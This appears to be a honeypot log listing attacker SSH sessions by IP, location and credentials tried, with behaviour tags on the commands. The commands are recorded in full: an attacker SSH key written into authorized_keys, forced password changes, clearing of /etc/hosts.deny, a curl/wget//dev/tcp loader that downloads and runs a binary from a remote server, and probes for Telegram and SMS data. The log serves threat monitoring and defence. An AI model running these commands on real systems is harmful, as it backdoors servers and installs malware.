$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo -e "fjbdfdjkdsfs541544\n8tow4UAmLHxp\n8tow4UAmLHxp"|passwd|bash
$ Enter new UNIX password: Γ—4
$ echo "fjbdfdjkdsfs541544\n8tow4UAmLHxp\n8tow4UAmLHxp\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo -e "123456\nuWCxRwC77vpU\nuWCxRwC77vpU"|passwd|bash
$ echo "123456\nuWCxRwC77vpU\nuWCxRwC77vpU\n"|passwd
$ echo -e "nokia123\nRkzx53XZJwmD\nRkzx53XZJwmD"|passwd|bash
$ echo "nokia123\nRkzx53XZJwmD\nRkzx53XZJwmD\n"|passwd
$ echo -e "useradmin@123\nSb3cX6otd2pQ\nSb3cX6otd2pQ"|passwd|bash
$ echo "useradmin@123\nSb3cX6otd2pQ\nSb3cX6otd2pQ\n"|passwd
🎭 cipher_root_46 (159.65.8.74) β€” Singapore, Singapore Β· 2 sessions Β· 39 cmds
2026-05-28 04:10 EDT Β· as admin/fjbdfdjkdsfs541544, root/p@ssw0rd
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "fjbdfdjkdsfs541544\nzzL5l7BKekEU\nzzL5l7BKekEU"|passwd|bash
$ Enter new UNIX password:
$ echo "fjbdfdjkdsfs541544\nzzL5l7BKekEU\nzzL5l7BKekEU\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:Vq8OsQawENv5"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 meatball_root_3 (171.25.158.68) β€” Vaxjo, Sweden Β· 2 sessions Β· 40 cmds
2026-05-28 04:12 EDT Β· as admin/fjbdfdjkdsfs541544, sanjay/sanjay
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "sanjay\njWJhJtsgk7ZW\njWJhJtsgk7ZW"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "sanjay\njWJhJtsgk7ZW\njWJhJtsgk7ZW\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "fjbdfdjkdsfs541544\nYxFk9dQXAtAs\nYxFk9dQXAtAs"|passwd|bash
$ echo "fjbdfdjkdsfs541544\nYxFk9dQXAtAs\nYxFk9dQXAtAs\n"|passwd
🎭 frost_root_7 (45.93.158.108) β€” Sosnovoborsk, Russia Β· 2 sessions Β· 40 cmds
2026-05-28 04:13 EDT Β· as admin/fjbdfdjkdsfs541544, sanjay/sanjay
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "fjbdfdjkdsfs541544\nIKpEy6BGc8Bw\nIKpEy6BGc8Bw"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "fjbdfdjkdsfs541544\nIKpEy6BGc8Bw\nIKpEy6BGc8Bw\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "sanjay\n2gWlHrLoMQwE\n2gWlHrLoMQwE"|passwd|bash
$ echo "sanjay\n2gWlHrLoMQwE\n2gWlHrLoMQwE\n"|passwd
🎭 abba_root_4 (188.148.136.25) β€” Gothenburg, Sweden Β· 1 session Β· 9 cmds
2026-05-28 04:16 EDT Β· as root/12345
file attribute tampering β†’ SSH key persistence
$ /ip cloud print
$ ifconfig // network mapping
$ uname -a // OS/kernel identification
$ cat /proc/cpuinfo // CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
🎭 chateau_root_7 (185.192.97.91) β€” Lauterbourg, France Β· 1 session Β· 3 cmds
2026-05-28 03:31 EDT Β· as root/123456
echo β†’ payload download from C2 β†’ execute from /tmp
$ echo 1 > /dev/null && cat /bin/echo
$ nohup $SHELL -c "curl http://47.99.197.248:6836/linux -o /tmp/8gU7DqTT3z; if [ ! -f /tmp/8gU7DqTT3z ]; then wget http://47.99.197.248:6836/linux -O /tmp/8gU7DqTT3z; fi; if [ ! -f /tmp/8gU7DqTT3z ]; then exec 6<>/dev/tcp/47.99.197.248/6836 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/8gU7DqTT3z ; chmod +x /tmp/8gU7DqTT3z && /tmp/8gU7DqTT3z z/KQMvNxaSxn4dk0M8vBMjXG6Wwibn7tK5LmoLzglyvscWU0YO/EJT3P1TUxxvZkMG1n7DOX6Le34pcl7HlpLGLs2Tc11ck3Ms3uZTNvfP0xk/y3t/yVPOpnbTZt4sE9N83bMDLZ4GwsbX3vK5XgvbTknDPqaWs1e+rDNyrOwyo9w+JjMm555CWV4L2g55Ir73tnLGTqxj88w8MxJcboYyxufPMziuC+u+idNe55fzZi9sUxN9XJND3Z62U4Z3rvPITqoL/hkCvsem0sYe7NPD3OyyQxwPZnMWZn7DyV/L+55Z4z735vImHv2Tc3wtU1Msb2ZDNnc+owkueuuOKKNOtnZyxh6s08Mc3IJDTF6Xs2bmfpNYrjv7zonDfueH9ZZ7nHNz6YyTQyzepmMW1z6jWR5bS04/k/63hoN3XuxSs2yM8qPMD2ZzZoc+Q9k+uuuOKKNOp5cTBg69kyM8HNNDTH7XUzbXnzMpP8ubf8kDfncG07ZfjGNDfVyj0rxuhsLG566j+S5rq88pAy83BsLGTvwis2y8I+PcLtYSJrfvM3kOCgu+qKPelzaTJk6M4lPc/VNTHG9mQwbWfsM5fot7filyXle3EzYO/ZNDTI1TUwxuJtN2h8/TST4KC25Io07H9xM2zozTI3wsMkMcD2bTtxe+k3iuO8veiSPet+fzZm9sY2PdXIPCvG6WM4aX/tPITgvL78lT3tZ2Y7e+/GPzLLyjQw1+p7MGhn6iuV4rm05ZQ87WlrNXvqwzYqycs8K8Tobzpse+S27tZBdF9KXpG3nDf8Dfb4MmtvxFwVFqlEcjw428c=; fi; echo 123456 > /tmp/.opass; chmod +x /tmp/8gU7DqTT3z && /tmp/8gU7DqTT3z z/KQMvNxaSxn4dk0M8vBMjXG6Wwibn7tK5LmoLzglyvscWU0YO/EJT3P1TUxxvZkMG1n7DOX6Le34pcl7HlpLGLs2Tc11ck3Ms3uZTNvfP0xk/y3t/yVPOpnbTZt4sE9N83bMDLZ4GwsbX3vK5XgvbTknDPqaWs1e+rDNyrOwyo9w+JjMm555CWV4L2g55Ir73tnLGTqxj88w8MxJcboYyxufPMziuC+u+idNe55fzZi9sUxN9XJND3Z62U4Z3rvPITqoL/hkCvsem0sYe7NPD3OyyQxwPZnMWZn7DyV/L+55Z4z735vImHv2Tc3wtU1Msb2ZDNnc+owkueuuOKKNOtnZyxh6s08Mc3IJDTF6Xs2bmfpNYrjv7zonDfueH9ZZ7nHNz6YyTQyzepmMW1z6jWR5bS04/k/63hoN3XuxSs2yM8qPMD2ZzZoc+Q9k+uuuOKKNOp5cTBg69kyM8HNNDTH7XUzbXnzMpP8ubf8kDfncG07ZfjGNDfVyj0rxuhsLG566j+S5rq88pAy83BsLGTvwis2y8I+PcLtYSJrfvM3kOCgu+qKPelzaTJk6M4lPc/VNTHG9mQwbWfsM5fot7filyXle3EzYO/ZNDTI1TUwxuJtN2h8/TST4KC25Io07H9xM2zozTI3wsMkMcD2bTtxe+k3iuO8veiSPet+fzZm9sY2PdXIPCvG6WM4aX/tPITgvL78lT3tZ2Y7e+/GPzLLyjQw1+p7MGhn6iuV4rm05ZQ87WlrNXvqwzYqycs8K8Tobzpse+S27tZBdF9KXpG3nDf8Dfb4MmtvxFwVFqlEcjw428c=" & // payload download from C2
$ head -c 3716336 > /tmp/aNRaVrEiUC // execute from /tmp
🎭 lotus_root_11 (103.54.101.216) β€” Sangrur, India Β· 2 sessions Β· 40 cmds
2026-05-28 03:05 EDT Β· as admin/fjbdfdjkdsfs541544, fred/fred
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "fjbdfdjkdsfs541544\nxobRL6J1ek8H\nxobRL6J1ek8H"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "fjbdfdjkdsfs541544\nxobRL6J1ek8H\nxobRL6J1ek8H\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "fred\nuODFw7HgVh5N\nuODFw7HgVh5N"|passwd|bash
$ echo "fred\nuODFw7HgVh5N\nuODFw7HgVh5N\n"|passwd
🎭 specter_root_54 (41.93.32.39) β€” Dar es Salaam, Tanzania Β· 2 sessions Β· 22 cmds
2026-05-24 17:28 EDT Β· as admin/fjbdfdjkdsfs541544, root/Cloud@2026
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "fjbdfdjkdsfs541544\nbRGBJNiwo9zk\nbRGBJNiwo9zk"|passwd|bash
$ Enter new UNIX password:
$ echo "fjbdfdjkdsfs541544\nbRGBJNiwo9zk\nbRGBJNiwo9zk\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_root_52 (123.58.219.3) β€” Hong Kong, Hong Kong Β· 1 session Β· 20 cmds
2026-05-28 03:00 EDT Β· as admin/fjbdfdjkdsfs541544
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "fjbdfdjkdsfs541544\nzmMnAjm4jMWA\nzmMnAjm4jMWA"|passwd|bash
$ Enter new UNIX password:
$ echo "fjbdfdjkdsfs541544\nzmMnAjm4jMWA\nzmMnAjm4jMWA\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 autobahn_root_8 (4.184.246.230) β€” Frankfurt am Main, Germany Β· 3 sessions Β· 58 cmds
2026-05-12 06:29 EDT Β· as admin/fjbdfdjkdsfs541544, root/Qq112233.., root/admin123$%^
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "fjbdfdjkdsfs541544\nUuhqk1rKEvhc\nUuhqk1rKEvhc"|passwd|bash
$ Enter new UNIX password:
$ echo "fjbdfdjkdsfs541544\nUuhqk1rKEvhc\nUuhqk1rKEvhc\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:ANtZFtUEn8Ed"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ echo "root:Ir5jBLchbEmy"|chpasswd|bash
🎭 phantom_root_53 (83.235.21.125) β€” Athens, Greece Β· 3 sessions Β· 59 cmds
2026-05-21 09:34 EDT Β· as admin/fjbdfdjkdsfs541544, root/shujuku, socks/socks
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "fjbdfdjkdsfs541544\npiMqF0AwHi4f\npiMqF0AwHi4f"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "fjbdfdjkdsfs541544\npiMqF0AwHi4f\npiMqF0AwHi4f\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "socks\njv1gvYYX20LL\njv1gvYYX20LL"|passwd|bash
$ echo "socks\njv1gvYYX20LL\njv1gvYYX20LL\n"|passwd
$ echo "root:TMhAzaaWqie6"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 steppe_root_3 (185.40.30.168) β€” Moscow, Russia Β· 2 sessions Β· 40 cmds
2026-05-28 00:56 EDT Β· as admin/fjbdfdjkdsfs541544, home/home
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "fjbdfdjkdsfs541544\nNI0wStvyCKv7\nNI0wStvyCKv7"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "fjbdfdjkdsfs541544\nNI0wStvyCKv7\nNI0wStvyCKv7\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "home\n6zRYphitMVuU\n6zRYphitMVuU"|passwd|bash
$ echo "home\n6zRYphitMVuU\n6zRYphitMVuU\n"|passwd
🎭 phantom_root_54 (34.81.72.185) β€” Taipei, Taiwan Β· 1 session Β· 19 cmds
2026-05-28 00:48 EDT Β· as root/A@123456
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
